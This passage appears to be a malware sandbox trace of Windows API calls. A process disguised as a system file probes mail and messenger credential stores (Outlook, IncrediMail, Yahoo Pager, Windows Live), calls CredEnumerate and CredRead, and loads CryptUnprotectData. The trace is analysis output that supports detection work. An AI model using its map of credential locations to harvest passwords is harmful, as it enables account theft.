lpSrc="%programfiles%\\Mozilla Thunderbird", lpDst=0x9c327f, nSize=0x104 | out: lpDst="C:\\Program Files (x86)\\Mozilla Thunderbird") returned 0x2b [0252.096] GetFileAttributesA (lpFileName="C:\\Program Files (x86)\\Mozilla Thunderbird" (normalized: "c:\\program files (x86)\\mozilla thunderbird")) returned 0xffffffff [0252.096] _strcmpi (_Str1="/stext", _Str2="/scomma") returned 1 [0252.096] _strcmpi (_Str1="/shtml", _Str2="/scomma") returned 1 [0252.096] _strcmpi (_Str1="/sverhtml", _Str2="/scomma") returned 1 [0252.096] _strcmpi (_Str1="/sxml", _Str2="/scomma") returned 1 [0252.096] _strcmpi (_Str1="/stab", _Str2="/scomma") returned 1 [0252.096] _strcmpi (_Str1="/scomma", _Str2="/scomma") returned 0 [0252.097] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19f7bc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0252.097] _mbscat (in: param_1=0x19f7bc, param_2=0x414450 | out: param_1=0x19f7bc) returned 0x19f7bc [0252.097] _mbscpy (in: param_1=0x19f8cc, param_2=0x19f7bc | out: param_1=0x19f8cc) returned 0x19f8cc [0252.097] _mbscpy (in: param_1=0x19f9d1, param_2=0x414458 | out: param_1=0x19f9d1) returned 0x19f9d1 [0252.097] GetPrivateProfileIntA (lpAppName="General", lpKeyName="ShowGridLines", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0252.097] GetPrivateProfileIntA (lpAppName="General", lpKeyName="SaveFilterIndex", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0252.097] GetPrivateProfileIntA (lpAppName="General", lpKeyName="AddExportHeaderLine", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0252.097] GetPrivateProfileIntA (lpAppName="General", lpKeyName="MarkOddEvenRows", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0252.097] GetPrivateProfileStringA (in: lpAppName="General", lpKeyName="WinPos", lpDefault="", lpReturnedString=0x19d77c, nSize=0x2000, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0252.097] strlen (_Str="") returned 0x0 [0252.098] GetPrivateProfileStringA (in: lpAppName="General", lpKeyName="Columns", lpDefault="", lpReturnedString=0x19d76c, nSize=0x2000, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg" | out: lpReturnedString="") returned 0x0 [0252.098] strlen (_Str="") returned 0x0 [0252.098] GetPrivateProfileIntA (lpAppName="General", lpKeyName="Sort", nDefault=0, lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.cfg") returned 0x0 [0252.098] _mbsicmp (_Str1=0x4143d4, _Str2=0x9c35a0) returned 1 [0252.098] _mbsicmp (_Str1=0x4143d4, _Str2=0x9c35a8) returned -1 [0252.098] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0252.099] SetCursor (hCursor=0x10007) returned 0x10007 [0252.099] LoadLibraryA (lpLibFileName="pstorec.dll") returned 0x73810000 [0252.459] GetProcAddress (hModule=0x73810000, lpProcName="PStoreCreateInstance") returned 0x73811290 [0252.459] PStoreCreateInstance () returned 0x80004001 [0252.459] FreeLibrary (hLibModule=0x73810000) returned 1 [0252.459] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x77130000 [0252.462] GetProcAddress (hModule=0x77130000, lpProcName="CryptUnprotectData") returned 0x7717af50 [0252.462] GetComputerNameA (in: lpBuffer=0x19e86c, nSize=0x19e978 | out: lpBuffer="LHNIWSJ", nSize=0x19e978) returned 1 [0252.463] GetUserNameA (in: lpBuffer=0x19e76c, pcbBuffer=0x19e978 | out: lpBuffer="SYSTEM", pcbBuffer=0x19e978) returned 1 [0252.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19e86c, cbMultiByte=-1, lpWideCharStr=0x19e36c, cchWideChar=255 | out: lpWideCharStr="LHNIWSJ") returned 8 [0252.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19e76c, cbMultiByte=-1, lpWideCharStr=0x19e56c, cchWideChar=255 | out: lpWideCharStr="SYSTEM") returned 7 [0252.466] strlen (_Str="LHNIWSJ") returned 0x7 [0252.466] strlen (_Str="SYSTEM") returned 0x6 [0252.466] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Google\\Google Talk\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e9a4 | out: phkResult=0x19e9a4*=0x0) returned 0x2 [0252.466] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Google\\Google Desktop\\Mailboxes", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f9a8 | out: phkResult=0x19f9a8*=0x0) returned 0x2 [0252.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x760f0000 [0252.466] GetProcAddress (hModule=0x760f0000, lpProcName="CredReadA") returned 0x761258f0 [0252.466] GetProcAddress (hModule=0x760f0000, lpProcName="CredFree") returned 0x76114010 [0252.466] GetProcAddress (hModule=0x760f0000, lpProcName="CredDeleteA") returned 0x761256b0 [0252.467] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateA") returned 0x76125710 [0252.467] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateW") returned 0x76113950 [0252.467] CredEnumerateW (in: Filter=0x0, Flags=0x0, Count=0x19f618, Credential=0x19f614 | out: Count=0x19f618, Credential=0x19f614) returned 0 [0252.468] FreeLibrary (hLibModule=0x760f0000) returned 1 [0252.468] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Account Manager\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0252.468] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0252.468] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fab0 | out: phkResult=0x19fab0*=0x0) returned 0x2 [0252.468] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0252.468] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0252.468] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles", ulOptions=0x0, samDesired=0x20019, phkResult=0x19facc | out: phkResult=0x19facc*=0x0) returned 0x2 [0252.468] FreeLibrary (hLibModule=0x77130000) returned 1 [0252.470] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fabc | out: phkResult=0x19fabc*=0x0) returned 0x2 [0252.470] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fabc | out: phkResult=0x19fabc*=0x0) returned 0x2 [0252.470] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Group Mail", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f868 | out: phkResult=0x19f868*=0x0) returned 0x2 [0252.470] _mbscpy (in: param_1=0x19f9a3, param_2=0x413fc4 | out: param_1=0x19f9a3) returned 0x19f9a3 [0252.470] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\MSNMessenger", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f694 | out: phkResult=0x19f694*=0x0) returned 0x2 [0252.470] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\MessengerService", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f690 | out: phkResult=0x19f690*=0x0) returned 0x2 [0252.470] _mbscpy (in: param_1=0x19f533, param_2=0x413fc4 | out: param_1=0x19f533) returned 0x19f533 [0252.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x760f0000 [0252.470] GetProcAddress (hModule=0x760f0000, lpProcName="CredReadA") returned 0x761258f0 [0252.470] GetProcAddress (hModule=0x760f0000, lpProcName="CredFree") returned 0x76114010 [0252.470] GetProcAddress (hModule=0x760f0000, lpProcName="CredDeleteA") returned 0x761256b0 [0252.470] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateA") returned 0x76125710 [0252.470] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateW") returned 0x76113950 [0252.470] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x77130000 [0252.473] GetProcAddress (hModule=0x77130000, lpProcName="CryptUnprotectData") returned 0x7717af50 [0252.474] CredReadA (in: TargetName="Passport.Net\\*", Type=0x4, Flags=0x0, Credential=0x19f674 | out: Credential=0x19f674) returned 0 [0252.479] FreeLibrary (hLibModule=0x760f0000) returned 1 [0252.479] FreeLibrary (hLibModule=0x77130000) returned 1 [0252.481] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Yahoo\\Pager", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eef4 | out: phkResult=0x19eef4*=0x0) returned 0x2 [0252.481] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IdentityCRL", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea88 | out: phkResult=0x19ea88*=0x168) returned 0x0 [0252.481] RegOpenKeyExA (in: hKey=0x168, lpSubKey="Dynamic Salt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea8c | out: phkResult=0x19ea8c*=0x0) returned 0x2 [0252.481] RegCloseKey (hKey=0x168) returned 0x0 [0252.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x760f0000 [0252.482] GetProcAddress (hModule=0x760f0000, lpProcName="CredReadA") returned 0x761258f0 [0252.482] GetProcAddress (hModule=0x760f0000, lpProcName="CredFree") returned 0x76114010 [0252.482] GetProcAddress (hModule=0x760f0000, lpProcName="CredDeleteA") returned 0x761256b0 [0252.482] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateA") returned 0x76125710 [0252.482] GetProcAddress (hModule=0x760f0000, lpProcName="CredEnumerateW") returned 0x76113950 [0252.482] CredEnumerateW (in: Filter="WindowsLive:name=*", Flags=0x0, Count=0x19f788, Credential=0x19f78c | out: Count=0x19f788, Credential=0x19f78c) returned 0 [0252.483] FreeLibrary (hLibModule=0x760f0000) returned 1 [0252.483] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x19f798, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0252.490] strlen (_Str="\\Microsoft\\Windows Mail") returned 0x17 [0252.490] _mbscat (in: param_1=0x19f7ce, param_2=0x4154f4 | out: param_1=0x19f7ce) returned 0x19f7ce [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x4d [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x4d [0252.490] strlen (_Str="*.oeaccount") returned 0xb [0252.490] _mbscpy (in: param_1=0x19ed5c, param_2=0x19f124 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x4d [0252.490] _mbscat (in: param_1=0x19ed5c, param_2=0x414078 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.490] _mbscat (in: param_1=0x19ed5c, param_2=0x4154e8 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.490] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail\\*.oeaccount", lpFindFileData=0x19eea0 | out: lpFindFileData=0x19eea0) returned 0xffffffff [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x4d [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x4d [0252.490] strlen (_Str="*.*") returned 0x3 [0252.490] _mbscpy (in: param_1=0x19f26c, param_2=0x19f634 | out: param_1=0x19f26c) returned 0x19f26c [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x4d [0252.490] _mbscat (in: param_1=0x19f26c, param_2=0x414078 | out: param_1=0x19f26c) returned 0x19f26c [0252.490] _mbscat (in: param_1=0x19f26c, param_2=0x4147c4 | out: param_1=0x19f26c) returned 0x19f26c [0252.490] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Mail\\*.*", lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0xffffffff [0252.490] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x19f798, csidl=28, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 1 [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local") returned 0x36 [0252.490] strlen (_Str="\\Microsoft\\Windows Live Mail") returned 0x1c [0252.490] _mbscat (in: param_1=0x19f7ce, param_2=0x41550c | out: param_1=0x19f7ce) returned 0x19f7ce [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x52 [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x52 [0252.490] strlen (_Str="*.oeaccount") returned 0xb [0252.490] _mbscpy (in: param_1=0x19ed5c, param_2=0x19f124 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.490] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x52 [0252.490] _mbscat (in: param_1=0x19ed5c, param_2=0x414078 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.490] _mbscat (in: param_1=0x19ed5c, param_2=0x4154e8 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.491] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.oeaccount", lpFindFileData=0x19eea0 | out: lpFindFileData=0x19eea0) returned 0xffffffff [0252.504] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x52 [0252.504] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x52 [0252.504] strlen (_Str="*.*") returned 0x3 [0252.504] _mbscpy (in: param_1=0x19f26c, param_2=0x19f634 | out: param_1=0x19f26c) returned 0x19f26c [0252.504] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x52 [0252.504] _mbscat (in: param_1=0x19f26c, param_2=0x414078 | out: param_1=0x19f26c) returned 0x19f26c [0252.504] _mbscat (in: param_1=0x19f26c, param_2=0x4147c4 | out: param_1=0x19f26c) returned 0x19f26c [0252.504] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.*", lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0xffffffff [0252.504] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Live Mail", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f768 | out: phkResult=0x19f768*=0x0) returned 0x2 [0252.504] ExpandEnvironmentStringsA (in: lpSrc="", lpDst=0x19f8a0, nSize=0x104 | out: lpDst="") returned 0x1 [0252.504] strlen (_Str="") returned 0x0 [0252.505] _strcmpi (_Str1="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows Live Mail", _Str2="") returned 1 [0252.505] strlen (_Str="") returned 0x0 [0252.505] strlen (_Str="") returned 0x0 [0252.505] strlen (_Str="*.oeaccount") returned 0xb [0252.505] _mbscpy (in: param_1=0x19ed5c, param_2=0x19f124 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.505] strlen (_Str="") returned 0x0 [0252.505] _mbscat (in: param_1=0x19ed5c, param_2=0x4154e8 | out: param_1=0x19ed5c) returned 0x19ed5c [0252.505] FindFirstFileA (in: lpFileName="*.oeaccount", lpFindFileData=0x19eea0 | out: lpFindFileData=0x19eea0) returned 0xffffffff [0252.571] strlen (_Str="") returned 0x0 [0252.571] strlen (_Str="") returned 0x0 [0252.571] strlen (_Str="*.*") returned 0x3 [0252.571] _mbscpy (in: param_1=0x19f26c, param_2=0x19f634 | out: param_1=0x19f26c) returned 0x19f26c [0252.571] strlen (_Str="") returned 0x0 [0252.571] _mbscat (in: param_1=0x19f26c, param_2=0x4147c4 | out: param_1=0x19f26c) returned 0x19f26c [0252.571] FindFirstFileA (in: lpFileName="*.*", lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0x24e9e0 [0252.571] strlen (_Str="") returned 0x0 [0252.571] strlen (_Str=".") returned 0x1 [0252.571] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.571] strlen (_Str="") returned 0x0 [0252.571] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.571] strcmp (_Str1=".", _Str2="..") returned -1 [0252.571] strcmp (_Str1=".", _Str2=".") returned 0 [0252.571] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.571] strlen (_Str="") returned 0x0 [0252.571] strlen (_Str="..") returned 0x2 [0252.571] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.571] strlen (_Str="") returned 0x0 [0252.571] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.571] strcmp (_Str1="..", _Str2="..") returned 0 [0252.571] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.571] strlen (_Str="") returned 0x0 [0252.571] strlen (_Str="0409") returned 0x4 [0252.571] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.571] strlen (_Str="") returned 0x0 [0252.571] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.572] strcmp (_Str1="0409", _Str2="..") returned 1 [0252.572] strcmp (_Str1="0409", _Str2=".") returned 1 [0252.572] strlen (_Str="0409") returned 0x4 [0252.572] strlen (_Str="0409") returned 0x4 [0252.572] strlen (_Str="*.oeaccount") returned 0xb [0252.572] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0252.572] strlen (_Str="0409") returned 0x4 [0252.572] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0252.572] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0252.572] FindFirstFileA (in: lpFileName="0409\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0252.573] strlen (_Str="0409") returned 0x4 [0252.573] strlen (_Str="0409") returned 0x4 [0252.573] strlen (_Str="*.*") returned 0x3 [0252.573] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0252.573] strlen (_Str="0409") returned 0x4 [0252.573] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0252.573] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0252.574] FindFirstFileA (in: lpFileName="0409\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24e760 [0252.574] strlen (_Str="0409") returned 0x4 [0252.574] strlen (_Str=".") returned 0x1 [0252.574] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.574] strlen (_Str="0409") returned 0x4 [0252.574] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.574] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.574] strcmp (_Str1=".", _Str2="..") returned -1 [0252.574] strcmp (_Str1=".", _Str2=".") returned 0 [0252.574] FindNextFileA (in: hFindFile=0x24e760, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0252.574] strlen (_Str="0409") returned 0x4 [0252.574] strlen (_Str="..") returned 0x2 [0252.574] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0252.574] strlen (_Str="0409") returned 0x4 [0252.574] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0252.574] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0252.574] strcmp (_Str1="..", _Str2="..") returned 0 [0252.574] FindNextFileA (in: hFindFile=0x24e760, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0252.574] FindClose (in: hFindFile=0x24e760 | out: hFindFile=0x24e760) returned 1 [0252.574] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.574] strlen (_Str="") returned 0x0 [0252.574] strlen (_Str="12520437.cpx") returned 0xc [0252.574] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="12520850.cpx") returned 0xc [0252.575] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="@OpenWithToastLogo.png") returned 0x16 [0252.575] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="@TileEmpty1x1Image.png") returned 0x16 [0252.575] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="AboveLockAppHost.dll") returned 0x14 [0252.575] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="accessibilitycpl.dll") returned 0x14 [0252.575] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="AccountsControlInternal.dll") returned 0x1b [0252.575] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] strlen (_Str="") returned 0x0 [0252.575] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.575] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.575] strlen (_Str="") returned 0x0 [0252.575] strlen (_Str="ACCTRES.dll") returned 0xb [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="acledit.dll") returned 0xb [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="aclui.dll") returned 0x9 [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="acppage.dll") returned 0xb [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="ActionCenter.dll") returned 0x10 [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0252.576] strlen (_Str="") returned 0x0 [0252.576] strlen (_Str="ActionCenterCPL.dll") returned 0x13 [0252.576] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] strlen (_Str="") returned 0x0 [0252.576] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0252.576] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) 